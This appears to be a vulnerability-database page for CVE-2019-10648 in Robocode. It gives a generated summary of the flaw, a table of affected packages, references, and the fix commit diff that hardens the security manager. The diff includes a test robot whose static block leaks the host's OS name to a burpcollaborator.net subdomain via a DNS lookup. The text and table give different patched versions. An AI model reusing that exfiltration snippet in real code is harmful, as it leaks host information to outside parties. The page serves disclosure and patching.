CVE-2019-10648
Description
Robocode before 1.9.3.6 allows attackers to force DNS queries to an attacker-controlled domain via a java.net.URL.openStream call bypassing the security manager.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Robocode before 1.9.3.6 allows attackers to force DNS queries to an attacker-controlled domain via a java.net.URL.openStream call bypassing the security manager.
Vulnerability
Robocode versions 1.9.3.5 and earlier contain a security flaw that allows robot code to make arbitrary DNS queries. The vulnerability lies in the security manager's failure to block java.net.URL.openStream() calls, which can trigger DNS lookups. Affected versions: Robocode through 1.9.3.5. The fix was committed in commit 836c846 and is included in version 1.9.3.6 [1][2].
Exploitation
An attacker can create a malicious robot that, when executed in Robocode, calls java.net.URL.openStream() on a URL containing a unique subdomain within their controlled DNS zone. No authentication or special privileges are required beyond the ability to provide a robot for execution. The attack does not require user interaction beyond running the robot. The DNS query is the observable external interaction [1].
Impact
Successful exploitation causes an outbound DNS query from the host running Robocode to the attacker's DNS server. This can be used for DNS exfiltration of data or to confirm that a target is reachable. The primary CIA impact is limited to information disclosure via network observation and may facilitate other attacks that depend on knowing the host is active [1].
Mitigation
Robocode version 1.9.3.6, released shortly after the disclosure, fixes the issue by overriding checkPermission in the security manager to block SocketPermission for robot threads, preventing the DNS interaction. Users should upgrade to version 1.9.3.6 or later. No known workarounds exist for earlier versions [1][2].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
net.sf.robocode:robocode.hostMaven | < 1.9.3.7 | 1.9.3.7 |
Affected products
3Patches
1836c84635e98Bug-406: DNS interaction is not blocked by Robocode's security manager + test(s) to verify the fix
6 files changed · +97 −17
robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java+22 −4 modified@@ -12,7 +12,9 @@ import net.sf.robocode.host.IThreadManager; import net.sf.robocode.io.RobocodeProperties; +import java.net.SocketPermission; import java.security.AccessControlException; +import java.security.Permission; /** @@ -49,7 +51,6 @@ public void checkAccess(Thread t) { } Thread c = Thread.currentThread(); - if (isSafeThread(c)) { return; } @@ -84,7 +85,7 @@ public void checkAccess(Thread t) { if (robotProxy != null) { robotProxy.punishSecurityViolation(message); } - throw new AccessControlException(message); + throw new SecurityException(message); } } @@ -94,7 +95,6 @@ public void checkAccess(ThreadGroup g) { return; } Thread c = Thread.currentThread(); - if (isSafeThread(c)) { return; } @@ -123,9 +123,27 @@ public void checkAccess(ThreadGroup g) { String message = "Robots are only allowed to create up to 5 threads!"; robotProxy.punishSecurityViolation(message); - throw new AccessControlException(message); + throw new SecurityException(message); } } + + public void checkPermission(Permission perm) { + if (RobocodeProperties.isSecurityOff()) { + return; + } + Thread c = Thread.currentThread(); + if (isSafeThread(c)) { + return; + } + super.checkPermission(perm); + + if (perm instanceof SocketPermission) { + IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c); + String message = "Using socket is not allowed"; + robotProxy.punishSecurityViolation(message); + throw new SecurityException(message); + } + } private boolean isSafeThread(Thread c) { return threadManager.isSafeThread(c);
robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java+18 −0 added@@ -0,0 +1,18 @@ +package tested.robots; + +public class DnsAttack extends robocode.Robot { + static { + try { + new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".") + + ".randomsubdomain.burpcollaborator.net").openStream(); + } catch (Exception e) { + } + } + + public void run() { + for (;;) { + ahead(100); + back(100); + } + } +}
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java+5 −6 modified@@ -19,7 +19,7 @@ public class TestConstructorHttpAttack extends RobocodeTestBed { private boolean messagedInitialization; - private boolean messagedAccessDenied; + private boolean securityExceptionOccurred; @Override public String getRobotNames() { @@ -36,20 +36,19 @@ public void onTurnEnded(TurnEndedEvent event) { messagedInitialization = true; } - if (out.contains("access denied (java.net.SocketPermission") - || out.contains("access denied (\"java.net.SocketPermission\"")) { - messagedAccessDenied = true; + if (out.contains("java.lang.SecurityException:")) { + securityExceptionOccurred = true; } } @Override protected void runTeardown() { Assert.assertTrue("Error during initialization", messagedInitialization); - Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); + Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); } @Override protected int getExpectedErrors() { - return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error + return 2; } }
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java+5 −6 modified@@ -18,7 +18,7 @@ */ public class TestHttpAttack extends RobocodeTestBed { - private boolean messagedAccessDenied; + private boolean securityExceptionOccurred; @Override public String getRobotNames() { @@ -31,19 +31,18 @@ public void onTurnEnded(TurnEndedEvent event) { final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); - if (out.contains("access denied (java.net.SocketPermission") - || out.contains("access denied (\"java.net.SocketPermission\"")) { - messagedAccessDenied = true; + if (out.contains("java.lang.SecurityException:")) { + securityExceptionOccurred = true; } } @Override protected void runTeardown() { - Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); + Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); } @Override protected int getExpectedErrors() { - return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors. + return 1; } }
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java+46 −0 added@@ -0,0 +1,46 @@ +/** + * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors + * All rights reserved. This program and the accompanying materials + * are made available under the terms of the Eclipse Public License v1.0 + * which accompanies this distribution, and is available at + * https://robocode.sourceforge.io/license/epl-v10.html + */ +package net.sf.robocode.test.robots; + +import net.sf.robocode.test.helpers.RobocodeTestBed; +import org.junit.Assert; +import robocode.control.events.TurnEndedEvent; + +/** + * @author Flemming N. Larsen (original) + */ +public class TestStaticConstructorDnsAttack extends RobocodeTestBed { + + private boolean securityExceptionOccurred; + + @Override + public String getRobotNames() { + return "tested.robots.DnsAttack,sample.Target"; + } + + @Override + public void onTurnEnded(TurnEndedEvent event) { + super.onTurnEnded(event); + + final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); + + if (out.contains("SYSTEM: Using socket is not allowed")) { + securityExceptionOccurred = true; + } + } + + @Override + protected void runTeardown() { + Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); + } + + @Override + protected int getExpectedErrors() { + return 1; + } +}
versions.md+1 −1 modified@@ -2,7 +2,7 @@ ### Bugfixes * [Bug-404][]: Confusion between development/non-development versions of bots - * Rollback of previous attempt to fix issues with the RobocodeEngine, which could not read robots in "developer mode" (marked with a asterix character). Hence the old bug [Bug-398][] is back. + * Rollback of previous attempt to fix issues with the RobocodeEngine, which could not read robots in "developer mode" (marked with a asterix character). Hence the old bug [Bug-398][] has been reintroduced. ### Changes * Fix by Bumfo, which makes Robocode faster at detecting robots in the robot folder, which is crucial for the RoboRumble, when installing or updating a huge amount of robots.
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/advisories/GHSA-q2xp-75m7-gv52ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2019-10648ghsaADVISORY
- github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bdghsax_refsource_MISCWEB
- sourceforge.net/p/robocode/bugs/406ghsaWEB
- sourceforge.net/p/robocode/bugs/406/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.